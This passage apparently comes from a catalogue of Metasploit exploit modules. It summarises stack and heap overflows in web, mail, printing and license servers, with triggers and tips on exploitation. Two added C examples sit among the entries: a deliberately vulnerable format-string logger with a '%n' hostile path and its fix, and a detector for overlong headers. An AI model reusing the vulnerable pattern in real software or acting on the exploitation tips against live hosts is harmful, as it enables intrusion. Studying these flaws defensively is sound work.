This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable. CVE-2004-2271 OSVDB-11530 BID-11620 http://archives.neohapsis.com...

NaviCOPA 2.0.1 URL Handling Buffer Overflow
This module exploits a stack buffer overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters. CVE-2006-5112 OSVDB-29257 BID-20250

Novell Messenger Server 2.0 Accept-Language Overflow
This module exploits a stack buffer overflow in Novell GroupWise Messenger Server v2.0. This flaw is triggered by any HTTP request with an Accept-Language header greater than 16 bytes. To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current encoder modules, very few payloads are usable. CVE-2006-0992 OSVDB-24617 BID-17503

Now SMS/MMS Gateway Buffer Overflow
This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code. CVE-2008-0871 OSVDB-42953 BID-27896

Oracle 9i XDB HTTP PASS Overflow (win32)
This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. CVE-2003-0727 OSVDB-2449 BID-8375 http://www.blackhat.com/prese...

PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters. CVE-2006-1148 OSVDB-23777 BID-17040 http://www.infigo.hr/in_focus...

Private Wire Gateway Buffer Overflow
This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility. CVE-2006-3252 OSVDB-26861 BID-18647

PSO Proxy v0.91 Stack Buffer Overflow
This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten. CVE-2004-0313 OSVDB-4028 http://www.milw0rm.com/exploi... BID-9706

Sambar 6 Search Results Buffer Overflow
This module exploits a buffer overflow found in the /search/results.stm application that comes with Sambar 6. This code is a direct port of Andrew Griffiths's SMUDGE exploit, the only changes made were to the nops and payload. This exploit causes the service to die, whether you provided the correct target or not. CVE-2004-2086 OSVDB-5786 BID-9607

SAP DB 7.4 WebTools Buffer Overflow
This module exploits a stack buffer overflow in SAP DB 7.4 WebTools. By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code. CVE-2007-3614 OSVDB-37838 BID-24773

Savant 3.1 Web Server Overflow
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended. CVE-2002-1120 OSVDB-9829 BID-5686 http://www.milw0rm.com/exploi...

Rhinosoft Serv-U Session Cookie Buffer Overflow
This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5. Sending a specially crafted POST request with an overly long session cookie string, an attacker may be able to execute arbitrary code. CVE-2009-4006 OSVDB-59772 http://rangos.de/ServU-ADV.txt http://lists.grok.org.uk/pipe...

SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put. CVE-2004-1373 OSVDB-12585 BID-12096
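
The HTTPDX tolog() entry above and this SHOUTcast entry are the same bug class: request data reaches a printf-family call as the format argument. The C below is an added example written for this page, not code from either product. It shows a tolog()-shaped variadic logger called with the request path as the format, the one-token fix, and a triage helper that counts the directives an input would trigger, separating %n (writes) from the read-only ones. The function names and the sample paths are assumptions.

```c
/* Added example of the format-string logging bug class; not HTTPDX or SHOUTcast code. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Logging sink in the shape of a tolog()-style variadic helper. */
static int tolog(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable: the request path becomes the format string. Any '%' directive
 * in it is interpreted (%x reads stack words, %n writes a count through a
 * pointer read from the stack). Calling this with such input is undefined
 * behaviour, so the demo only ever feeds it a plain path. */
int log_request_vulnerable(char *out, size_t outsz, const char *path)
{
    return tolog(out, outsz, path);
}

/* Fixed: the format is a literal and the path is only ever an argument. */
int log_request_fixed(char *out, size_t outsz, const char *path)
{
    return tolog(out, outsz, "%s", path);
}

/* Triage: counts the directives a string would trigger if it were used as a
 * format, and how many are %n. "%%" is a literal percent and is not counted. */
int count_directives(const char *s, int *n_writes)
{
    int count = 0;
    *n_writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        const char *q = p + 1;
        while (*q && strchr("0123456789-+ #.*hlLqjzt$", *q)) q++;  /* flags, width, length */
        if (!*q) break;                   /* dangling '%' at end of string */
        count++;
        if (*q == 'n') (*n_writes)++;
        p = q;
    }
    return count;
}

int directive_count(const char *s)       { int w; return count_directives(s, &w); }
int write_directive_count(const char *s) { int w; count_directives(s, &w); return w; }

/* 1 if the fixed logger reproduces the input byte for byte (directives inert). */
int fixed_logger_is_inert(const char *path)
{
    char line[256];
    log_request_fixed(line, sizeof line, path);
    return strcmp(line, path) == 0;
}

int main(void)
{
    const char *hostile = "/stream/%n%n%x";   /* constructed request path */
    char line[256];
    log_request_vulnerable(line, sizeof line, "/plain");   /* safe only because no '%' */
    printf("hostile path carries %d directives, %d of them %%n writes\n",
           directive_count(hostile), write_directive_count(hostile));
    printf("fixed logger inert: %d\n", fixed_logger_is_inert(hostile));
    return 0;
}
```

Compilers flag the vulnerable shape only when the format is passed directly to a known printf-family function; once it goes through a wrapper like tolog() without a format attribute, -Wformat-security is silent, which is how this pattern survives in logging code.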

SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
This module exploits a stack buffer overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. Based on an original exploit by skOd but using a different method found by hdm. CVE-2006-5216 OSVDB-29565 http://shttpd.sourceforge.net BID-20393

Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow
This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending an overly long User-Agent in an HTTP GET request, an attacker may be able to execute arbitrary code. CVE-2008-0550 OSVDB-42670 http://aluigi.altervista.org/...

Sybase EAServer 5.2 Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in the Sybase EAServer Web Console. The offset to the SEH frame appears to change depending on what version of Java is in use by the remote server, making this exploit somewhat unreliable. CVE-2005-2297 OSVDB-17996 BID-14287

TrackerCam PHP Argument Buffer Overflow
This module exploits a simple stack buffer overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code. CVE-2005-0478 OSVDB-13953 OSVDB-13955 BID-12592 http://aluigi.altervista.org/...

Trend Micro OfficeScan Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in Trend Micro OfficeScan cgiChkMasterPwd.exe (running with SYSTEM privileges). CVE-2008-1365 OSVDB-42499

Xitami 2.5c2 Web Server If-Modified-Since Overflow
This module exploits a stack buffer overflow in the iMatix Corporation Xitami Web Server. If a malicious user sends an If-Modified-Since header containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique. You may wish to adjust WfsDelay appropriately. CVE-2007-5067 OSVDB-40594 OSVDB-40595 BID-25772 http://www.milw0rm.com/exploi...

Novell ZENworks Configuration Management Remote Execution
This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0. By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory and then make a secondary request that allows for arbitrary code execution. OSVDB-63412 BID-39114 http://www.zerodayinitiative.... http://tucanalamigo.blogspot....

Microsoft IIS WebDAV Write Access Code Execution
This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script using a WebDAV PUT request. OSVDB-397 BID-12141

Microsoft IIS 5.0 Printer Host Header Overflow
This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process. CVE-2001-0241 OSVDB-3323 BID-2674 MSB-MS01-023 http://seclists.org/lists/bug...

Microsoft IIS/PWS CGI Filename Double Decode Command Execution
This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory. CVE-2001-0333 OSVDB-556 BID-2708 MSB-MS01-026 http://marc.info/?l=bugtraq&m...

Microsoft IIS 5.0 IDQ Path Overflow
This module exploits a stack buffer overflow in the IDQ ISAPI handler for Microsoft Index Server. CVE-2001-0500 OSVDB-568 MSB-MS01-033 BID-2880

Microsoft IIS 4.0 .HTR Path Overflow
This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters. CVE-1999-0874 OSVDB-3325 BID-307 http://www.eeye.com/html/rese... MSB-MS02-018

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against any service pack. CVE-2003-0109 OSVDB-4467 BID-7116 MSB-MS03-007

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely! CVE-2005-4267 OSVDB-22097 BID-15980

IMail IMAP4D Delete Overflow
This module exploits a buffer overflow in the 'DELETE' command of the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. CVE-2004-1520 OSVDB-11838 BID-11675

Ipswitch IMail IMAP SEARCH Buffer Overflow
This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. In order for this module to be successful, the IMAP user must have at least one message. CVE-2007-3925 OSVDB-36219 BID-24962

MailEnable IMAPD (2.35) Login Request Buffer Overflow
MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command. CVE-2006-6423 OSVDB-32125 BID-21492 http://lists.grok.org.uk/pipe...

MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code. CVE-2005-2278 OSVDB-17844 BID-14243 NSS-19193

MailEnable IMAPD W3C Logging Buffer Overflow
This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected. CVE-2005-3155 OSVDB-19842 BID-15006

Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts. CVE-2004-1520 OSVDB-11838 BID-11675

MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli. CVE-2008-1358 OSVDB-43111 BID-28245 http://www.milw0rm.com/exploi...

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discovering the vulnerability. CVE-2006-1255 OSVDB-23950 BID-17138

Mercur Messaging 2005 IMAP Login Buffer Overflow
This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results. CVE-2006-1255 OSVDB-23950 BID-17138 http://archives.neohapsis.com...

Mercury/32 <= 4.01b LOGIN Buffer Overflow
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org). CVE-2007-1373 OSVDB-33883

Mercury/32 v4.01a IMAP RENAME Buffer Overflow
This module exploits a stack buffer overflow vulnerability in the Mercury/32 v4.01a IMAP service. CVE-2004-1211 OSVDB-12508 BID-11775 NSS-15867

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. CVE-2006-6425 OSVDB-31362 BID-21723 http://www.zerodayinitiative....

Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE GSSAPI command. By sending an overly long string, an attacker can overwrite the buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp or windows/shell_reverse_tcp allows for the most reliable results. OSVDB-55175 http://www.w00t-shell.net/#

Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. CVE-2005-3314 OSVDB-20956 BID-15491

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. CVE-2006-6761 OSVDB-31360 BID-21728 http://labs.idefense.com/inte...

Microsoft IIS Phone Book Service Overflow
This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. CVE-2000-1089 OSVDB-463 BID-2048 MSB-MS00-094

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022. CVE-2003-0349 OSVDB-4535 BID-8035 MSB-MS03-022 http://archives.neohapsis.com...

Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular module works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue. CVE-2003-0822 OSVDB-2952 BID-9007 MSB-MS03-051

Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
This module exploits a stack buffer overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service. CVE-2005-4734 OSVDB-20151

Microsoft IIS ISAPI w3who.dll Query String Overflow
This module exploits a stack buffer overflow in the w3who.dll ISAPI application. This vulnerability was discovered by Nicolas Gregoire and this code has been successfully tested against Windows 2000 and Windows XP (SP2). When exploiting Windows XP, the payload must call RevertToSelf before it will be able to spawn a command shell. CVE-2004-1134 OSVDB-12258 http://www.exaprobe.com/labs/... BID-11820

IMail LDAP Service Buffer Overflow
This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000. CVE-2004-0297 OSVDB-3984 BID-9682 http://secunia.com/advisories...

Computer Associates License Client GETCONFIG Overflow
This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system's point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug. CVE-2005-0581 OSVDB-14389 BID-12705 http://labs.idefense.com/inte...

Computer Associates License Server GETCONFIG Overflow
This module exploits a vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. CVE-2005-0581 OSVDB-14389 BID-12705 http://labs.idefense.com/inte...

SentinelLM UDP Buffer Overflow
This module exploits a simple stack buffer overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particularly popular with academic products. If the wrong target value is selected, the service will crash and not restart. CVE-2005-0353 OSVDB-14605 BID-12742

IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
This module exploits a stack buffer overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes. CVE-2008-2240 OSVDB-45415 BID-29310 http://www-01.ibm.com/support...
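
Several entries on this page give a concrete trigger in the request headers: Accept-Language longer than 16 bytes (Novell Messenger), 100 bytes (HP NNM ovalarm.exe) or 114 bytes (Domino above), an oversized Authorization (MailEnable, Free Download Manager), Host (Novell eDirectory) or If-Modified-Since (Xitami) value, and 32 header lines (icecast). The C below is an added example written for this page, not any product's or Metasploit's code: a request scorer that flags a header count at or above 32 and per-header value lengths over a budget. The Accept-Language budget is the tightest trigger the page lists; the other budgets, the default cap and the constructed sample requests are assumptions, and the tight Accept-Language value will flag legitimate multi-language browsers, so size these from real traffic before deploying.

```c
/* Added example: scoring HTTP requests for the overlong-header triggers listed on this page. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HEADER_COUNT_LIMIT 32       /* page: 32 headers overran icecast's array */
#define DEFAULT_MAX_VALUE_LEN 4096  /* assumed budget for headers without a rule */

struct header_rule { const char *name; size_t max_value_len; };

static const struct header_rule rules[] = {
    { "Accept-Language",   16 },   /* page: Novell Messenger trips above 16 */
    { "Authorization",    512 },   /* assumed */
    { "Host",             255 },   /* assumed */
    { "If-Modified-Since", 64 },   /* assumed */
};

/* True when line starts with "name:" (name compared case-insensitively). */
static int header_is(const char *line, const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i]))
            return 0;
    return line[n] == ':';
}

/* Length of the value after "Name:" and optional whitespace. */
static size_t value_len(const char *line)
{
    const char *v = strchr(line, ':');
    if (v == NULL) return strlen(line);      /* malformed line: count all of it */
    for (v++; *v == ' ' || *v == '\t'; v++) ;
    return strlen(v);
}

/* Scores one request: lines[0] is the request line, lines[1..] are headers.
 * Returns the number of findings; the first one is described in reason. */
int check_request(const char *const *lines, int nlines, char *reason, size_t rsz)
{
    int findings = 0;
    int nheaders = nlines > 0 ? nlines - 1 : 0;
    if (rsz) reason[0] = '\0';
    if (nheaders >= HEADER_COUNT_LIMIT) {
        snprintf(reason, rsz, "%d header lines (limit %d)", nheaders, HEADER_COUNT_LIMIT);
        findings++;
    }
    for (int i = 1; i < nlines; i++) {
        size_t limit = DEFAULT_MAX_VALUE_LEN;
        const char *which = "header";
        for (size_t r = 0; r < sizeof rules / sizeof rules[0]; r++)
            if (header_is(lines[i], rules[r].name)) {
                limit = rules[r].max_value_len;
                which = rules[r].name;
                break;
            }
        size_t len = value_len(lines[i]);
        if (len > limit) {
            if (findings == 0)
                snprintf(reason, rsz, "%s value is %zu bytes (limit %zu)", which, len, limit);
            findings++;
        }
    }
    return findings;
}

/* Constructed sample requests. */
int demo_benign(void)
{
    const char *lines[] = { "GET / HTTP/1.1", "Host: example.test",
                            "Accept-Language: en-US,en", "Accept: */*" };
    char reason[128];
    return check_request(lines, 4, reason, sizeof reason);
}

int demo_long_accept_language(void)
{
    char tag[121], line[160], reason[128];
    memset(tag, 'A', 120); tag[120] = '\0';          /* 120-byte language tag */
    snprintf(line, sizeof line, "Accept-Language: %s", tag);
    const char *lines[] = { "GET / HTTP/1.1", "Host: example.test", line };
    return check_request(lines, 3, reason, sizeof reason);
}

int demo_many_headers(void)
{
    char store[40][24], reason[128];
    const char *lines[41];
    lines[0] = "GET / HTTP/1.1";
    for (int i = 0; i < 40; i++) {                     /* 40 short padding headers */
        snprintf(store[i], sizeof store[i], "X-Pad-%d: a", i);
        lines[i + 1] = store[i];
    }
    return check_request(lines, 41, reason, sizeof reason);
}
```

Run the three demo functions from a main() of your own to see the counts; the reason buffer carries the first finding, which is what you would want in an alert. The same loop can be fed from a proxy log or a packet capture once the header lines are split out.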

IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
This module exploits a stack buffer overflow in Lotus Domino's Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez. CVE-2008-2499 OSVDB-45610 BID-29328 http://www.zerodayinitiative....

Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
This module exploits a stack buffer overflow in Hummingbird Connectivity 10 LPD Daemon. This module has only been tested against Hummingbird Exceed v10 with SP5. CVE-2005-1815 OSVDB-16957 BID-13788

NIPrint LPD Request Overflow
This module exploits a stack buffer overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-) CVE-2003-1141 OSVDB-2774 BID-8968 http://www.immunitysec.com/do...

SAP SAPLPD 6.28 Buffer Overflow
This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40). By sending an overly long argument, an attacker may be able to execute arbitrary code. CVE-2008-0621 OSVDB-41127 BID-27613

WinComLPD <= 3.0.2 Buffer Overflow
This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote administration service, an attacker may be able to execute arbitrary code. CVE-2008-5159 OSVDB-42861 BID-27614

AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This module was tested successfully against master.exe as included with Real Network's Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This module does not work with NX/XD enabled but could be modified easily to do so. The address CVE-2010-1318 OSVDB-63919 http://labs.idefense.com/inte...

Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long RTSP response to a client, an attacker may be able to execute arbitrary code. CVE-2007-6166 OSVDB-40876 BID-26549 http://milw0rm.com/exploits/4648

Asus Dpcproxy Buffer Overflow
This module exploits a stack buffer overflow in Asus Dpcproxy version 2.0.0.19. It should be vulnerable until version 2.0.0.24. Credit to Luigi Auriemma. CVE-2008-1491 OSVDB-43638 BID-28394

BakBone NetVault Remote Heap Overflow
This module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee. CVE-2005-1009 OSVDB-15234 BID-12967

BigAnt Server 2.2 Buffer Overflow
This module exploits a stack buffer overflow in BigAnt Server 2.2. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. CVE-2008-1914 OSVDB-44454 BID-28795

BigAnt Server 2.50 SP1 Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.50 SP1. CVE-2008-1914 OSVDB-44454 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

BigAnt Server 2.52 USV Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart; you only get one shot. OSVDB-61386 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

Bomberclone 0.11.6 Buffer Overflow
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with the address of lstrcpyA; the second and third values are the destination buffer, and the fourth value is the source address of our buffer on the stack. This exploit works like a return-into-libc attack. ATTENTION: the shellcode is executed ONLY when someone tries to close Bomberclone. CVE-2006-0460 OSVDB-23263 BID-16697 http://www.frsirt.com/english...

Bopup Communications Server Buffer Overflow
This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. CVE-2009-2227 OSVDB-55275 http://www.blabsoft.com/produ... http://milw0rm.com/exploits/9002

Borland Interbase Create-Request Buffer Overflow
This module exploits a stack buffer overflow in Borland Interbase 2007. By sending a specially crafted create-request packet, a remote attacker may be able to execute arbitrary code. CVE-2007-3566 OSVDB-38602 http://dvlabs.tippingpoint.co...

Borland CaliberRM StarTeam Multicast Service Buffer Overflow
This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending a specially crafted GET request to the STMulticastService, an attacker may be able to execute arbitrary code. CVE-2008-0311 OSVDB-44039 BID-28602

DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
This module exploits a stack buffer overflow in the authentication mechanism of NSI DoubleTake, which is also rebranded as HP StorageWorks. This vulnerability was found by Titon of Bastard Labs. CVE-2008-1661 OSVDB-45924

eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13. CVE-2006-3838 OSVDB-27526 BID-19163 http://www.zerodayinitiative....

eIQNetworks ESA Topology DELETEDEVICE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13. CVE-2006-3838 OSVDB-27528 BID-19164

Eureka Email 2.2q ERR Remote Buffer Overflow Exploit
This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here. CVE-2009-3837 OSVDB-59262 http://www.exploit-db.com/exp...

Firebird Relational Database isc_attach_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. CVE-2007-5243 OSVDB-38607 BID-25917 http://www.risesecurity.org/a...

Firebird Relational Database isc_create_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. CVE-2007-5243 OSVDB-38606 BID-25917 http://www.risesecurity.org/a...

Firebird Relational Database SVC_attach() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. CVE-2007-5243 OSVDB-38605 BID-25917 http://www.risesecurity.org/a...

HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one. CVE-2007-2280 BID-37396 OSVDB-61206 http://www.zerodayinitiative....

HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the second one. CVE-2009-3844 BID-37250 OSVDB-60852 http://www.zerodayinitiative....

HP OpenView Operations OVTrace Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50. By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. CVE-2007-3872 OSVDB-39527 BID-25255

Borland InterBase isc_attach_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. CVE-2007-5243 OSVDB-38607 BID-25917 http://www.risesecurity.org/a...

Borland InterBase isc_create_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. CVE-2007-5243 OSVDB-38606 BID-25917 http://www.risesecurity.org/a...

Borland InterBase SVC_attach() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. CVE-2007-5243 OSVDB-38605 BID-25917 http://www.risesecurity.org/a...

IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service. By sending a "ping" packet containing a long string, an attacker can execute arbitrary code. NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order for the vulnerable code to be reached. This state doesn't appear to be reachable when the TSM server is not running. This service does not restart. CVE-2009-3853 OSVDB-59632

IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
